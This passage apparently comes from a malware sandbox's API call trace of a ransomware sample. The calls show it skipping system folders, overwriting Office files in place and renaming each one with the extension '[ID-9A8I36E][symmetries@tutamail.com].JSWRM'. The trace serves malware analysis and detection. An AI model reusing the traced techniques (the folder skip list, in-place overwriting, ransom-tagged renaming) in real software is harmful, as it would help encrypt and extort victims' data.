lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALEVENT.VRD", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CALEVENT.VRD", lpUsedDefaultChar=0x0) returned 12 [0113.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0113.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0113.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALEVENT.VRD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALEVENT.VRD", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CALEVENT.VRD", lpUsedDefaultChar=0x0) returned 12 [0113.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0113.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0113.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0113.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0113.648] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\CALEVENT.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\calevent.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.649] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2144) returned 1 [0113.649] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x860) returned 0x20c6c0 [0113.649] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x860, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x860, lpOverlapped=0x0) returned 1 [0113.650] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.650] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x860, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x860, lpOverlapped=0x0) returned 1 [0113.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0113.651] CloseHandle (hObject=0x238) returned 1 [0113.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0113.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0113.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0113.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0113.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0113.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0113.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.651] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\CALEVENT.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\calevent.vrd"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\CALEVENT.VRD.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\calevent.vrd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0113.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0113.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0113.652] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf311d3eb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf311d3eb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf3143659, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3670, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="CERTINTL.DLL", cAlternateFileName="")) returned 1 [0113.652] lstrcmpiW (lpString1="CERTINTL.DLL", lpString2=".") returned 1 [0113.652] lstrcmpiW (lpString1="CERTINTL.DLL", lpString2="..") returned 1 [0113.652] lstrcmpiW (lpString1="CERTINTL.DLL", lpString2="...") returned 1 [0113.652] lstrcmpiW (lpString1="CERTINTL.DLL", lpString2="windows") returned -1 [0113.652] lstrcmpiW (lpString1="CERTINTL.DLL", lpString2="recovery") returned -1 [0113.652] lstrcmpiW (lpString1="CERTINTL.DLL", lpString2="perflogs") returned -1 [0113.652] lstrcmpiW (lpString1="CERTINTL.DLL", lpString2="documents and settings") returned -1 [0113.652] lstrcmpiW (lpString1="CERTINTL.DLL", lpString2="$RECYCLE.BIN") returned 1 [0113.652] lstrcmpiW (lpString1="CERTINTL.DLL", lpString2="system volume information") returned -1 [0113.652] lstrcmpiW (lpString1="CERTINTL.DLL", lpString2="msocache") returned -1 [0113.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0113.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CERTINTL.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CERTINTL.DLL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CERTINTL.DLL", lpUsedDefaultChar=0x0) returned 12 [0113.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0113.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0113.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CERTINTL.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CERTINTL.DLL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CERTINTL.DLL", lpUsedDefaultChar=0x0) returned 12 [0113.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0113.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0113.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0113.653] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xef9622ad, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xef9622ad, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xef9622ad, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x19490, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="CLVWINTL.DLL", cAlternateFileName="")) returned 1 [0113.653] lstrcmpiW (lpString1="CLVWINTL.DLL", lpString2=".") returned 1 [0113.653] lstrcmpiW (lpString1="CLVWINTL.DLL", lpString2="..") returned 1 [0113.653] lstrcmpiW (lpString1="CLVWINTL.DLL", lpString2="...") returned 1 [0113.653] lstrcmpiW (lpString1="CLVWINTL.DLL", lpString2="windows") returned -1 [0113.653] lstrcmpiW (lpString1="CLVWINTL.DLL", lpString2="recovery") returned -1 [0113.653] lstrcmpiW (lpString1="CLVWINTL.DLL", lpString2="perflogs") returned -1 [0113.653] lstrcmpiW (lpString1="CLVWINTL.DLL", lpString2="documents and settings") returned -1 [0113.653] lstrcmpiW (lpString1="CLVWINTL.DLL", lpString2="$RECYCLE.BIN") returned 1 [0113.653] lstrcmpiW (lpString1="CLVWINTL.DLL", lpString2="system volume information") returned -1 [0113.653] lstrcmpiW (lpString1="CLVWINTL.DLL", lpString2="msocache") returned -1 [0113.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0113.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLVWINTL.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLVWINTL.DLL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CLVWINTL.DLL", lpUsedDefaultChar=0x0) returned 12 [0113.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0113.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0113.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLVWINTL.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLVWINTL.DLL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CLVWINTL.DLL", lpUsedDefaultChar=0x0) returned 12 [0113.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0113.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0113.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0113.653] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x45348e5, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x45348e5, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4580dcb, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd7a, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="COFFEE.CSS", cAlternateFileName="")) returned 1 [0113.653] lstrcmpiW (lpString1="COFFEE.CSS", lpString2=".") returned 1 [0113.653] lstrcmpiW (lpString1="COFFEE.CSS", lpString2="..") returned 1 [0113.653] lstrcmpiW (lpString1="COFFEE.CSS", lpString2="...") returned 1 [0113.653] lstrcmpiW (lpString1="COFFEE.CSS", lpString2="windows") returned -1 [0113.653] lstrcmpiW (lpString1="COFFEE.CSS", lpString2="recovery") returned -1 [0113.654] lstrcmpiW (lpString1="COFFEE.CSS", lpString2="perflogs") returned -1 [0113.654] lstrcmpiW (lpString1="COFFEE.CSS", lpString2="documents and settings") returned -1 [0113.654] lstrcmpiW (lpString1="COFFEE.CSS", lpString2="$RECYCLE.BIN") returned 1 [0113.654] lstrcmpiW (lpString1="COFFEE.CSS", lpString2="system volume information") returned -1 [0113.654] lstrcmpiW (lpString1="COFFEE.CSS", lpString2="msocache") returned -1 [0113.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0113.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COFFEE.CSS", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0113.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COFFEE.CSS", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COFFEE.CSS", lpUsedDefaultChar=0x0) returned 10 [0113.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0113.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0113.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COFFEE.CSS", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0113.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COFFEE.CSS", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COFFEE.CSS", lpUsedDefaultChar=0x0) returned 10 [0113.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0113.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0113.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0113.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0113.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\COFFEE.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\coffee.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.655] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3450) returned 1 [0113.655] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd70) returned 0x206858 [0113.655] ReadFile (in: hFile=0x238, lpBuffer=0x206858, nNumberOfBytesToRead=0xd70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xd70, lpOverlapped=0x0) returned 1 [0113.672] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.672] WriteFile (in: hFile=0x238, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xd70, lpOverlapped=0x0) returned 1 [0113.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0113.672] CloseHandle (hObject=0x238) returned 1 [0113.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0113.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0113.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0113.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0113.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0113.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0113.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0113.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0113.672] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\COFFEE.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\coffee.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\COFFEE.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\coffee.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0113.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0113.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0113.674] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9a9e866, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9a9e866, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa284551, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3ede, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="CollectSignatures_Init.xsn", cAlternateFileName="COLLEC~2.XSN")) returned 1 [0113.674] lstrcmpiW (lpString1="CollectSignatures_Init.xsn", lpString2=".") returned 1 [0113.674] lstrcmpiW (lpString1="CollectSignatures_Init.xsn", lpString2="..") returned 1 [0113.674] lstrcmpiW (lpString1="CollectSignatures_Init.xsn", lpString2="...") returned 1 [0113.674] lstrcmpiW (lpString1="CollectSignatures_Init.xsn", lpString2="windows") returned -1 [0113.674] lstrcmpiW (lpString1="CollectSignatures_Init.xsn", lpString2="recovery") returned -1 [0113.674] lstrcmpiW (lpString1="CollectSignatures_Init.xsn", lpString2="perflogs") returned -1 [0113.674] lstrcmpiW (lpString1="CollectSignatures_Init.xsn", lpString2="documents and settings") returned -1 [0113.674] lstrcmpiW (lpString1="CollectSignatures_Init.xsn", lpString2="$RECYCLE.BIN") returned 1 [0113.674] lstrcmpiW (lpString1="CollectSignatures_Init.xsn", lpString2="system volume information") returned -1 [0113.674] lstrcmpiW (lpString1="CollectSignatures_Init.xsn", lpString2="msocache") returned -1 [0113.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0113.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CollectSignatures_Init.xsn", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0113.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0113.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CollectSignatures_Init.xsn", cchWideChar=26, lpMultiByteStr=0x240f70, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CollectSignatures_Init.xsn", lpUsedDefaultChar=0x0) returned 26 [0113.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0113.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0113.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CollectSignatures_Init.xsn", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0113.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0113.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CollectSignatures_Init.xsn", cchWideChar=26, lpMultiByteStr=0x241308, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CollectSignatures_Init.xsn", lpUsedDefaultChar=0x0) returned 26 [0113.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0113.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0113.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0113.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0113.674] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\CollectSignatures_Init.xsn" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\collectsignatures_init.xsn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.675] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16094) returned 1 [0113.675] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3ed0) returned 0x24c1d0 [0113.676] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3ed0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, 